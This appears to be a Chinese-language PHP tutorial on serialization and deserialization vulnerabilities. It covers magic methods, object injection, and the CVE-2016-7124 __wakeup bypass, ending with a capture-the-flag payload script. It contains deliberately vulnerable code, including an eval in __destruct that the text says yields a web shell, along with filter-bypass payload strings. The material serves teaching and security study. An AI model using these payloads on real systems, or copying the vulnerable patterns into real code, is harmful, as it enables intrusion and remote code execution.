1? 前言

最近也是在複習(xí)之前學(xué)過的內(nèi)容，感覺對(duì)PHP反序列化的理解更深了，所以在這裡總結(jié)一下

2? serialize()函數(shù)

???? 「所有php裡面的值都可以使用函數(shù)serialize()來傳回一個(gè)包含字節(jié)流的字串來表示。序列化一個(gè)物件將會(huì)保存物件的所有變量，但是不會(huì)保存物件的方法，只會(huì)保存類別的名字?！?/p>

一開始看這個(gè)概念可能有些懵，但之後也是慢慢理解了

在程式執(zhí)行結(jié)束時(shí)，內(nèi)存數(shù)據(jù)便會(huì)立即銷毀，變量所儲(chǔ)存的數(shù)據(jù)便是內(nèi)存數(shù)據(jù)，而文件、數(shù)據(jù)庫是“持久數(shù)據(jù)”，因此PHP序列化就是將記憶體的變數(shù)資料「保存」到檔案中的持久性資料的過程。

相關(guān)學(xué)習(xí)推薦：PHP程式設(shè)計(jì)從入門到精通

 $s = serialize($變量); //該函數(shù)將變量數(shù)據(jù)進(jìn)行序列化轉(zhuǎn)換為字符串
 file_put_contents(‘./目標(biāo)文本文件', $s); //將$s保存到指定文件

下面透過一個(gè)具體的例子來了解序列化：

<?php
class User
{
  public $age = 0;
  public $name = &#39;&#39;;

  public function PrintData()
  {
    echo &#39;User &#39;.$this->name.&#39;is&#39;.$this->age.&#39;years old. <br />&#39;;
  }
}
//創(chuàng)建一個(gè)對(duì)象
$user = new User();
// 設(shè)置數(shù)據(jù)
$user->age = 20;
$user->name = &#39;daye&#39;;

//輸出數(shù)據(jù)
$user->PrintData();
//輸出序列化之后的數(shù)據(jù)
echo serialize($user);

?>

這個(gè)是結(jié)果：

可以看到序列化一個(gè)物件後將會(huì)保存物件的所有變量，並且發(fā)現(xiàn)序列化後的結(jié)果都有一個(gè)字符，這些字元都是以下字母的縮寫。

a - array         b - boolean
d - double         i - integer
o - common object     r - reference
s - string         C - custom object
O - class         N - null
R - pointer reference   U - unicode string

了解了縮寫的類型字母，便可以得到PHP序列化格式

O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"daye";}
對(duì)象類型:長度:"類名":類中變量的個(gè)數(shù):{類型:長度:"值";類型:長度:"值";......}

透過以上例子，便可以理解了概念中的透過serialize()函數(shù)傳回一個(gè)包含位元組流的字串這一段話。

3? u??nserialize()函數(shù)

#unserialize() 對(duì)單一的已序列化的變數(shù)進(jìn)行操作，將其轉(zhuǎn)換回PHP 的值。在解序列化一個(gè)物件之前，這個(gè)物件的類別必須在解序列化之前定義。?

簡單來理解起來就算將序列化過儲(chǔ)存到檔案中的數(shù)據(jù)，恢復(fù)到程式碼的變數(shù)表示形式的過程，恢復(fù)到變數(shù)序列化之前的結(jié)果。

 $s = file_get_contents(‘./目標(biāo)文本文件'); //取得文本文件的內(nèi)容（之前序列化過的字符串）
 $變量 = unserialize($s); //將該文本內(nèi)容，反序列化到指定的變量中

透過一個(gè)例子來了解反序列化：

<?php
class User
{
  public $age = 0;
  public $name = &#39;&#39;;

  public function PrintData()
  {
    echo &#39;User &#39;.$this->name.&#39; is &#39;.$this->age.&#39; years old. <br />&#39;;
  }
}
//重建對(duì)象
$user = unserialize(&#39;O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"daye";}&#39;);

$user->PrintData();

?>

這個(gè)是結(jié)果：

##注意：在解序列化一個(gè)物件之前，這個(gè)物件的類別必須在解序列化之前定義。否則會(huì)報(bào)錯(cuò)

4? PHP反序列化漏洞

在學(xué)習(xí)漏洞前，先來了解PHP魔法函數(shù)，對(duì)接下來的學(xué)習(xí)會(huì)很有幫助

PHP 將所有以__（兩個(gè)底線）開頭的類別方法保留為魔術(shù)方法

__construct  當(dāng)一個(gè)對(duì)象創(chuàng)建時(shí)被調(diào)用，
__destruct  當(dāng)一個(gè)對(duì)象銷毀時(shí)被調(diào)用，
__toString  當(dāng)一個(gè)對(duì)象被當(dāng)作一個(gè)字符串被調(diào)用。
__wakeup()  使用unserialize時(shí)觸發(fā)
__sleep()  使用serialize時(shí)觸發(fā)
__destruct()  對(duì)象被銷毀時(shí)觸發(fā)
__call()  在對(duì)象上下文中調(diào)用不可訪問的方法時(shí)觸發(fā)
__callStatic()  在靜態(tài)上下文中調(diào)用不可訪問的方法時(shí)觸發(fā)
__get()  用于從不可訪問的屬性讀取數(shù)據(jù)
__set()  用于將數(shù)據(jù)寫入不可訪問的屬性
__isset()  在不可訪問的屬性上調(diào)用isset()或empty()觸發(fā)
__unset()   在不可訪問的屬性上使用unset()時(shí)觸發(fā)
__toString()  把類當(dāng)作字符串使用時(shí)觸發(fā),返回值需要為字符串
__invoke()  當(dāng)腳本嘗試將對(duì)象調(diào)用為函數(shù)時(shí)觸發(fā)

這裡只列出了一部分的魔法函數(shù)，

下面透過一個(gè)例子來了解魔法函數(shù)被自動(dòng)呼叫的過程

<?php
class test{
 public $varr1="abc";
 public $varr2="123";
 public function echoP(){
 echo $this->varr1."<br>";
 }
 public function __construct(){
 echo "__construct<br>";
 }
 public function __destruct(){
 echo "__destruct<br>";
 }
 public function __toString(){
 return "__toString<br>";
 }
 public function __sleep(){
 echo "__sleep<br>";
 return array(&#39;varr1&#39;,&#39;varr2&#39;);
 }
 public function __wakeup(){
 echo "__wakeup<br>";
 }
}

$obj = new test(); //實(shí)例化對(duì)象，調(diào)用__construct()方法，輸出__construct
$obj->echoP();  //調(diào)用echoP()方法，輸出"abc"
echo $obj;  //obj對(duì)象被當(dāng)做字符串輸出，調(diào)用__toString()方法，輸出__toString
$s =serialize($obj); //obj對(duì)象被序列化，調(diào)用__sleep()方法，輸出__sleep
echo unserialize($s); //$s首先會(huì)被反序列化，會(huì)調(diào)用__wake()方法，被反序列化出來的對(duì)象又被當(dāng)做字符串，就會(huì)調(diào)用_toString()方法。
// 腳本結(jié)束又會(huì)調(diào)用__destruct()方法，輸出__destruct
?>

這個(gè)是結(jié)果：

透過這個(gè)例子就可以清晰的看到魔法函數(shù)在符合對(duì)應(yīng)的條件時(shí)就會(huì)被呼叫。

5? 物件注入

當(dāng)使用者的請(qǐng)求在傳給反序列化函數(shù)unserialize()之前沒有被正確的篩選時(shí)就會(huì)產(chǎn)生漏洞。因?yàn)镻HP允許物件序列化，攻擊者就可以提交特定的序列化的字串給一個(gè)具有該漏洞的unserialize函數(shù)，最終導(dǎo)致一個(gè)在該應(yīng)用範(fàn)圍內(nèi)的任意PHP物件注入。

物件漏洞出現(xiàn)得符合兩個(gè)前提：

?????? 一、unserialize的參數(shù)可控制。?

?????? 二、 程式碼裡有定義一個(gè)含有魔術(shù)方法的類，且該方法裡出現(xiàn)一些使用類別成員變數(shù)作為參數(shù)的存在安全問題的函數(shù)。

下面來舉個(gè)例子：

<?php
class A{
  var $test = "demo";
  function __destruct(){
      echo $this->test;
  }
}
$a = $_GET[&#39;test&#39;];
$a_unser = unserialize($a);
?>

例如這個(gè)列子，直接是使用者產(chǎn)生的內(nèi)容傳遞給unserialize()函數(shù)，那就可以建構(gòu)這樣的語句

?test=O:1:"A":1:{s:4:"test";s:5:"lemon";}

在腳本運(yùn)行結(jié)束後便會(huì)呼叫_destruct函數(shù)，同時(shí)會(huì)覆寫test變數(shù)輸出lemon。

發(fā)現(xiàn)這個(gè)漏洞，便可以利用這個(gè)漏洞點(diǎn)控制輸入變量，拼接成一個(gè)序列化物件。

再看一個(gè)例子：

<?php
class A{
  var $test = "demo";
  function __destruct(){
    @eval($this->test);//_destruct()函數(shù)中調(diào)用eval執(zhí)行序列化對(duì)象中的語句
  }
}
$test = $_POST[&#39;test&#39;];
$len = strlen($test)+1;
$pp = "O:1:\"A\":1:{s:4:\"test\";s:".$len.":\"".$test.";\";}"; // 構(gòu)造序列化對(duì)象
$test_unser = unserialize($pp); // 反序列化同時(shí)觸發(fā)_destruct函數(shù)
?>

其實(shí)仔細(xì)觀察就會(huì)發(fā)現(xiàn)，其實(shí)我們手動(dòng)建構(gòu)序列化物件就是為了unserialize()函數(shù)能夠觸發(fā)__destruc()函數(shù)，然後執(zhí)行在_ _destruc()函數(shù)裡惡意的語句。

所以我們利用這個(gè)漏洞點(diǎn)便可以取得web shell了

#6? 繞過魔法函數(shù)的反序列化

wakeup()魔法函式繞過

PHP5<5.6.25
PHP7<7.0.10

PHP反序列化漏洞CVE-2016-7124

#a#重點(diǎn)：當(dāng)反序列化字符串中，表示屬性個(gè)數(shù)的值大于真實(shí)屬性個(gè)數(shù)時(shí)，會(huì)繞過 __wakeup 函數(shù)的執(zhí)行

百度杯——Hash

其實(shí)仔細(xì)分析代碼，只要我們能繞過兩點(diǎn)即可得到f15g_1s_here.php的內(nèi)容

（1）繞過正則表達(dá)式對(duì)變量的檢查
（2）繞過_wakeup()魔法函數(shù)，因?yàn)槿绻覀兎葱蛄谢牟皇?code>Gu3ss_m3_h2h2.php,這個(gè)魔法函數(shù)在反序列化時(shí)會(huì)觸發(fā)并強(qiáng)制轉(zhuǎn)成Gu3ss_m3_h2h2.php

那么問題就來了，如果繞過正則表達(dá)式
（1）/[oc]:\d+:/i，例如：o:4:這樣就會(huì)被匹配到,而繞過也很簡單，只需加上一個(gè)+,這個(gè)正則表達(dá)式即匹配不到0:+4:

（2）繞過_wakeup()魔法函數(shù)，上面提到了當(dāng)反序列化字符串中，表示屬性個(gè)數(shù)的值大于真實(shí)屬性個(gè)數(shù)時(shí)，會(huì)繞過 _wakeup 函數(shù)的執(zhí)行

編寫php序列化腳本

<?php
class Demo {
  private $file = &#39;Gu3ss_m3_h2h2.php&#39;;

  public function __construct($file) {
    $this->file = $file;
  }

  function __destruct() {
    echo @highlight_file($this->file, true);
  }

  function __wakeup() {
    if ($this->file != &#39;Gu3ss_m3_h2h2.php&#39;) {
      //the secret is in the f15g_1s_here.php
      $this->file = &#39;Gu3ss_m3_h2h2.php&#39;;
    }
  }
}
#先創(chuàng)建一個(gè)對(duì)象，自動(dòng)調(diào)用__construct魔法函數(shù)
$obj = new Demo(&#39;f15g_1s_here.php&#39;);
#進(jìn)行序列化
$a = serialize($obj);
#使用str_replace() 函數(shù)進(jìn)行替換，來繞過正則表達(dá)式的檢查
$a = str_replace(&#39;O:4:&#39;,&#39;O:+4:&#39;,$a);
#使用str_replace() 函數(shù)進(jìn)行替換，來繞過__wakeup()魔法函數(shù)
$a = str_replace(&#39;:1:&#39;,&#39;:2:&#39;,$a);
#再進(jìn)行base64編碼
echo base64_encode($a);
?>

以上是詳解之php反序列化的詳細(xì)內(nèi)容。更多資訊請(qǐng)關(guān)注PHP中文網(wǎng)其他相關(guān)文章！